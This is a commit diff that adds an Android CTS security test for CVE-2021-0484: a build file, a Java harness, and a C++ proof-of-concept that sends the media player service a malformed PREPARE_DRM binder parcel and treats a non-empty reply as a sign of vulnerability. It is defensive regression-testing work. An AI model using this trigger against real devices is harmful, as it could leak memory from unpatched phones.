[RESTRICT AUTOMERGE] CTS test for Android Security b/173720767
Bug: 173720767
Bug: 182917595
Test: Ran the new testcase on android-10.0.0_r39 with/without patch
Change-Id: I6b8bd254d3e93882b50b173dd090643692a3edea
(cherry picked from commit 58adf42d2581e2e30881273ed8115ae7f0c02add)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0484/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0484/Android.bp
new file mode 100644
index 0000000..9912e5e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0484/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0484",
+ defaults: [
+ "cts_hostsidetests_securitybulletin_defaults"
+ ],
+ srcs: [
+ "poc.cpp"
+ ],
+ shared_libs: [
+ "libbinder",
+ "libmedia",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0484/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0484/poc.cpp
new file mode 100644
index 0000000..a2e4ae5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0484/poc.cpp
@@ -0,0 +1,66 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <media/mediaplayer.h>
+#include "../includes/common.h"
+
+#define PREPARE_DRM 38
+
+using namespace android;
+
+int main() {
+ sp<IServiceManager> serviceManager = defaultServiceManager();
+ if (serviceManager == nullptr) {
+ return EXIT_FAILURE;
+ }
+
+ sp<IBinder> mediaPlayerService = serviceManager->getService(String16("media.player"));
+ if (mediaPlayerService == nullptr) {
+ return EXIT_FAILURE;
+ }
+
+ sp<IMediaPlayerService> iMediaPlayerService =
+ IMediaPlayerService::asInterface(mediaPlayerService);
+ if (iMediaPlayerService == nullptr) {
+ return EXIT_FAILURE;
+ }
+
+ MediaPlayer *mediaPlayer = new MediaPlayer();
+ if (mediaPlayer == nullptr) {
+ return EXIT_FAILURE;
+ }
+
+ sp<IMediaPlayer> iMediaPlayer = iMediaPlayerService->create(mediaPlayer);
+ if (iMediaPlayer == nullptr) {
+ delete (mediaPlayer);
+ return EXIT_FAILURE;
+ }
+
+ Parcel data, reply;
+ data.writeInterfaceToken(iMediaPlayer->getInterfaceDescriptor());
+ const uint8_t arr[16] = {};
+ data.write(arr, 16);
+ data.writeUint32(2);
+ data.writeUnpadded(arr, 1);
+
+ IMediaPlayer::asBinder(iMediaPlayer)->transact(PREPARE_DRM, data, &reply);
+ uint32_t size = 0;
+ reply.readUint32(&size);
+
+ delete (mediaPlayer);
+ return (size > 0) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java
new file mode 100644
index 0000000..915f296
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0484 extends SecurityTestCase {
+
+ /**
+ * b/173720767
+ * Vulnerability Behavior: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2021-05")
+ @Test
+ public void testPocCVE_2021_0484() throws Exception {
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2021-0484", getDevice());
+ testConfig.checkCrash = false;
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
